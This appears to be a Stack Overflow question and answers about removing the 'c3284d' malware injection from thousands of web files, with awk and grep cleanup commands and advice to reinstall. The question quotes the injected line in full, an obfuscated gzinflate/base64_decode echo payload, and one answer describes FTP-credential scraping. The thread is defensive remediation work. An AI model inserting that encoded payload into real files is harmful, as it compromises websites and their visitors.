# Clean server infected with c3284d virus, using search and replace

Tags: linux, bash, ubuntu, terminal

I'm having an issue with the Notorious c3284d virus. It modifies pretty much all the html/php/js files it can find.

I've changed all the passwords and users on the server, so if it's a compromised account it should have solved that issue, but I'm still struggling with removing it altogether.

I was able to find it all the infected files using a simple `sudo grep -R "#c3284d#" /home` command.

But I need a quick way to search and *replace* it.

The virus signature is this line:

> "#c3284d#"
>   echo(gzinflate(base64_decode("VVHBboMwDL1X6j/kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS+nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns/48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B/ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2+/EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS/7parGmkfU+y1b5D/HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18+XyLoNfNISRsBa1fG1UKwN+HIeK+Pqabw==")));
>   "#/c3284d#"

When the echo line can change and vary, but it will always start with `#c32..#` and finish with `#/c3....#`.

I just want to replace it with nothing.

Comment: Never do that! Reinstall from scratch. If you had proper version control and backups, you'd obviously use them. Make sure you do next time this happens.

Comment: @triplee why never do that ? the virus/male has static signature, there's i'm talking about 1000's of files. version control is not that common for none-development sites (for example blogs/forums with 100 and 1000's of static files)

Comment: possible duplicate of [Sed regexp multiline - replace HTML](http://stackoverflow.com/questions/11043363/sed-regexp-multiline-replace-html)

Comment: @tripleee seems just fine, thanks a million.

Comment: The reason to reinstall from scratch is that once someone's broken into your server, it's very hard to be sure you fixed everything they did to it.  The "#c3284d#" modifications are the only thing you've found, but that doesn't mean they're the only thing that was done.

Comment: Removing the bad stuff you know about will not fix the bad stuff you don't know about. It's a standard MO for hackers and malware to plant multiple back doors so they can get back in even if you notice them and try to revert their changes.

Answer (score 1, accepted):

```
awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }' dirty-file > clean-file
```

That's a mouthful but it does the trick:

```
$ cat <<'EOF' | awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }'
> foo
> #c3284d#
> bar
> baz
> #/c3284d#
> quux
> EOF
foo
quux
```

Comment: Will it remove the line between as well or will it only remove the signature ?

Comment: Assuming the start and end of signature appear together on the same line (you weren't clear on that point), it will remove the markers and everything between.

Comment: it's not on the same line.. seems like styling issue here at stack.. it's actually #32..# on the first line.. then the echo on the second.. and #/32... on the third

Comment: @phs: How do you used the command? I get `awk: cannot open dirty-file (No such file or directory)`. So how to make this recursively for all found files (by overwritting the existing one)?

Comment: @testing Consider using `find` piped to a loop.  I doubt `awk` will make edits in-place, but you could pipe the new file to somewhere in `/tmp` and then move it back over the original.

Comment: http://stackoverflow.com/questions/12427346/clean-server-infected-with-c3284d-malware-using-shell-script  provided ed script on this which will edit original file on the fly

Answer (score 1):

Simple way to find all affected files:

```
grep -H -r "c3284d" /home/user
```

This malware code comes from an infected client that has FTP passwords stored in plaintext. The malware is able to scrape the FTP logins, and then automatically starts injecting ad code into files. Definitely should be a full audit - but if you're lucky and caught it in time it is likely that it does not originate from the server itself.